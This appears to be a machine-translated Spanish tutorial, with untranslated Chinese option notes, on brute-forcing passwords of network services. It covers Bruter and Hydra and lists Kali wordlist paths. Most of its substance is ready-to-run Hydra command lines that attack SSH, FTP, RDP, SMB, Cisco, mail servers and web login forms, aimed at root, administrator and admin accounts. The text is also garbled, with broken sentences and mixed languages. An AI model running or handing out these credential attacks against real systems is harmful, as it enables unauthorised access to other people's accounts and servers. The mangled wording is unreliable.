Ruptura de fuerza bruta y código de verificación seguridad-CS frame conjetura de fuerza bruta

CS violenta conjetura

Se refiere a software, base de datos, sistema operativo, 3389 grietas relacionadas. C / S es el cliente / servidor. Aplicaciones basadas en la arquitectura C / S como ssh ftp
sql-server mysql, etc. Estos servicios a menudo proporcionan un usuario con altos privilegios, y este usuario con altos privilegios a menudo puede realizar operaciones de comando. Como sa de sql-server, root de mysql, sys y cuentas de sistema de oracle, el uso de estos usuarios con altos privilegios puede brindar comodidad a los desarrolladores en gran medida, pero si la contraseña está descifrada, el daño causado también es bastante grande. . La arquitectura C / S utiliza principalmente herramientas de crack Hydra, Bruter, X-scan

Se recomienda usar bruter debajo de la ventana

Agregue dirección, seleccione protocolo (SSH2 para Linux de destino, SMB para Windows, MYSQL para base de datos, POP3 para buzón), puerto ( consejo: el valor predeterminado de Linux es 22, use nmap para escanear si no sabe, telnet + Ip + puerto, vea cuál se usa SSH2 )

Linux nombre de usuario predeterminado es por lo general la raíz, Windows es el administrador
elegir un diccionario (nota no soporta el directorio chino)
iniciar
también puede utilizar la capacidad nativa
de longitud de la contraseña conjunto

Se recomienda usar Hydra bajo Linux

Kali viene con
él, también puede descargarlo e instalarlo usted mismo.
Tenga en cuenta que hydra-gtk es una interfaz gráfica.
Hydra es una herramienta de código abierto para descifrar la fuerza bruta del famoso grupo de hackers thc, que puede descifrar múltiples contraseñas en línea. Sitio web oficial: http://www.thc.org/thc-hydra

diccionario de contraseñas kail

/usr/share/wfuzz/wordlist/others/names.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
especifique el nombre de usuario y el archivo de lista de contraseñas en esta interfaz, aquí use el nombre de usuario y el
archivo de lista de contraseñas existentes en el sistema Kali Y seleccione la opción Loop around users. Entre ellos, los archivos de nombre de usuario y contraseña
se almacenan en /usr/share/wfuzz/wordlist/others/names.txt y
/usr/share/wfuzz/wordlist/others/common_pass.txt

Parámetro

		hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
		-R 继续从上一次进度接着破解。
		-S 采用 SSL 链接。
		-s PORT 可通过这个参数指定非默认端口。
		-l LOGIN 指定破解的用户名，对特定用户破解。
		-L FILE 指定用户名字典。
		-p PASS 小写，指定密码破解，少用，一般是采用密码字典。
		-P FILE 大写，指定密码字典。
		-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
			一般都是加上的
		-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P 参数。
		-M FILE 指定目标列表文件一行一条。
		-o FILE 指定结果输出文件。
		-f 在使用-M 参数以后，找到第一对登录名或者密码的时候中止破解。
		-t TASKS 同时运行的线程数，默认为 16。 -w TIME 设置最大超时的时间，单位秒，默认是 30s。 -v / -V 显示详细过程。
		server 目标 ip
		service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
			http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 l
		dap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp 
		rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd fi
		rebird ncp afp 等等。
		OPT 可选项

Ejemplos de uso

		1.手动创建用户名字典和密码字典，需要利用密码字典生成器生成强大的字典
		2.破解 ssh：

#hydra -L users.txt -P contraseña.txt -t 1 -vV -e ns 192.168.1.8 ssh se
descifró con éxito y los resultados se muestran directamente. También puede usar la opción -o para especificar el archivo de salida de resultados.

#hydra -L usuarios.txt -P contraseña.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

		1.破解 ssh：
			# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
				# hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
		2.破解 ftp：
			# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认 16) -vV
				# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
		3.get 方式提交，破解 web 登录：
			# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
				# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
		4.post 方式提交，破解 web 登录：
			# hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login:sorry password"
				# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "log in.php:id=^USER^&passwd=^PASS^:wrong username or password"
					（参数说明：-t 同时线程数 3，-l 用户名是 admin，字典 pass.txt，保存为 out.txt，-f 当破解了一个密码就停止， 10.36.16.18 目标 ip，http-post-form 表示破解是采用 http 的 post 方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。）
		5.破解 https：
			# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
		6.破解 teamspeak：
			# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
		7.破解 cisco：
			# hydra -P pass.txt 10.36.16.18 cisco
				# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
		8.破解 smb：
			# hydra -l administrator -P pass.txt 10.36.16.18 smb
		9.破解 pop3：
			# hydra -l muts -P pass.txt my.pop3.mail pop3
		10.破解 rdp：
			# hydra ip rdp -l administrator -P pass.txt -V
		11.破解 http-proxy：
			# hydra -l admin -P pass.txt http-proxy://10.36.16.18
		12.破解 imap：
			# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

Sobre el uso de hydra-gtk

		图形化界面界面比较简单，直接填写IP，设置字典，设置协议等
			就可以开始了

Suplemento

La elección del software de voladura depende principalmente de la velocidad, la estabilidad y la cantidad de protocolos admitidos.
Esta herramienta de descifrado de contraseñas de fuerza bruta es bastante poderosa y admite el descifrado de contraseñas en línea de casi todos los protocolos.
Si la contraseña puede descifrarse depende de si el diccionario es lo suficientemente fuerte.